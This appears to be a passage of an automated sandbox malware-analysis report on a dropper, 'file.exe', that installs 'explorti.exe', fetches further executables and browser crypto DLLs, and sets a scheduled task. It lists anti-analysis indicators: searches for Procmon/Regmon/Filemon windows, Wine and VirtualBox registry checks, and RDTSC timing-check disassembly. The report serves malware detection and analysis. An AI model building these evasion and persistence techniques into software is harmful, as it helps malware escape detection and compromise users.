Source: eb98fe5174.exe.6.dr Static PE information: section name: .taggant
Source: 53c7d901f1.exe.6.dr Static PE information: section name:
Source: 53c7d901f1.exe.6.dr Static PE information: section name: .rsrc
Source: 53c7d901f1.exe.6.dr Static PE information: section name: .idata
Source: 53c7d901f1.exe.6.dr Static PE information: section name:
Source: 53c7d901f1.exe.6.dr Static PE information: section name: ylafldxq
Source: 53c7d901f1.exe.6.dr Static PE information: section name: tgmwlthu
Source: 53c7d901f1.exe.6.dr Static PE information: section name: .taggant
Source: freebl3.dll.7.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.7.dr Static PE information: section name: .00cfg
Source: mozglue.dll.7.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.7.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.7.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.7.dr Static PE information: section name: .didat
Source: nss3.dll.7.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.7.dr Static PE information: section name: .00cfg
Source: softokn3.dll.7.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.7.dr Static PE information: section name: .00cfg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 6_2_00B0D84C push ecx; ret 6_2_00B0D85F
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C90B536 push ecx; ret 7_2_6C90B549
Source: file.exe Static PE information: section name: entropy: 7.97875321730639
Source: file.exe Static PE information: section name: gmovqjaa entropy: 7.954088444564839
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.97875321730639
Source: explorti.exe.0.dr Static PE information: section name: gmovqjaa entropy: 7.954088444564839
Source: random[1].exe.6.dr Static PE information: section name: ylafldxq entropy: 7.952660090693873
Source: eb98fe5174.exe.6.dr Static PE information: section name: ylafldxq entropy: 7.952660090693873
Source: 53c7d901f1.exe.6.dr Static PE information: section name: ylafldxq entropy: 7.952660090693873
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file

Boot Survival

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_5736606B9E4AF5D84DA5A728AAAD52EB
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: RegmonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: FilemonClass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: Filemonclass Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: PROCMON_WINDOW_CLASS Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe Window searched: window name: Regmonclass Jump to behavior
Source: C:\Users\user\Desktop\file.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe Code function: 7_2_6C9355F0 LoadLibraryW,LoadLibraryW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 7_2_6C9355F0
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000053001\8eb30d7f71.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\file.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000051000\eb98fe5174.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Roaming\1000052000\53c7d901f1.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5F05E second address: B5F064 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5E8ED second address: B5E8F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5E8F1 second address: B5E8F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: B5E8F5 second address: B5E900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDECEE second address: CDECF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDECF3 second address: CDECFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FF0BC8515D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDECFD second address: CDED07 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BCB462B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9D6A second address: CC9D7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9D7B second address: CC9D85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC9D85 second address: CC9D8F instructions: 0x00000000 rdtsc 0x00000002 jp 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD54 second address: CDDD63 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 js 00007FF0BCB462B6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD63 second address: CDDD7D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E6h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD7D second address: CDDD8A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD8A second address: CDDD8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD8E second address: CDDD9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FF0BCB462B6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDD9E second address: CDDDA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDDDA4 second address: CDDDAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDE095 second address: CDE099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDFEF8 second address: CDFEFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDFEFC second address: CDFF02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE0121 second address: CE016B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 68DD7A9Bh 0x00000011 js 00007FF0BCB462B6h 0x00000017 lea ebx, dword ptr [ebp+12454E62h] 0x0000001d mov dword ptr [ebp+122D2B95h], eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007FF0BCB462C8h 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE01D7 second address: CE0223 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FF0BC8515D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d call 00007FF0BC8515DAh 0x00000012 add dword ptr [ebp+122D1C9Eh], esi 0x00000018 pop ecx 0x00000019 push 00000000h 0x0000001b jmp 00007FF0BC8515E9h 0x00000020 mov dx, 4091h 0x00000024 call 00007FF0BC8515D9h 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE0223 second address: CE022D instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE022D second address: CE0232 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE0232 second address: CE0286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 jmp 00007FF0BCB462BDh 0x0000000e pop ecx 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 pushad 0x00000015 push eax 0x00000016 pop eax 0x00000017 jmp 00007FF0BCB462C4h 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f popad 0x00000020 pop eax 0x00000021 popad 0x00000022 mov eax, dword ptr [eax] 0x00000024 jmp 00007FF0BCB462BBh 0x00000029 mov dword ptr [esp+04h], eax 0x0000002d push eax 0x0000002e push edx 0x0000002f jns 00007FF0BCB462B8h 0x00000035 push edx 0x00000036 pop edx 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE0286 second address: CE028C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE028C second address: CE0290 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CF2C37 second address: CF2C3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF8EA second address: CFF912 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FF0BCB462C3h 0x0000000f jmp 00007FF0BCB462BBh 0x00000014 push edx 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFF912 second address: CFF925 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FF0BC8515DEh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFFA4D second address: CFFA72 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF0BCB462B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FF0BCB462C7h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CFFBAD second address: CFFBC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF0BC8515E8h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D00162 second address: D0016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0016A second address: D001AE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BC8515E8h 0x00000007 jmp 00007FF0BC8515E7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FF0BC8515DFh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D001AE second address: D001B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D009F4 second address: D00A0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FF0BC8515D6h 0x0000000a pushad 0x0000000b popad 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f jl 00007FF0BC8515D8h 0x00000015 push esi 0x00000016 pop esi 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D00A0B second address: D00A23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FF0BCB462BEh 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D00A23 second address: D00A3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jg 00007FF0BC8515D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D00A3B second address: D00A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 js 00007FF0BCB462B6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D00D96 second address: D00D9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D01F40 second address: D01F44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D039CA second address: D039CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D08042 second address: D0806A instructions: 0x00000000 rdtsc 0x00000002 jl 00007FF0BCB462C5h 0x00000008 jmp 00007FF0BCB462BFh 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 jns 00007FF0BCB462B6h 0x00000016 pop eax 0x00000017 pop edx 0x00000018 pop eax 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0806A second address: D08079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FF0BC8515D6h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D08079 second address: D08081 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D08081 second address: D08088 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C7D5 second address: D0C7F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF0BCB462C8h 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C7F5 second address: D0C7F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCB8DB second address: CCB8DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0BEB1 second address: D0BED8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 jc 00007FF0BC8515D6h 0x0000000e jmp 00007FF0BC8515E9h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0BED8 second address: D0BEDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C4DF second address: D0C4EB instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jo 00007FF0BC8515D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: D0C4EB second address: D0C505 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007FF0BCB462C4h 0x0000000b rdtsc
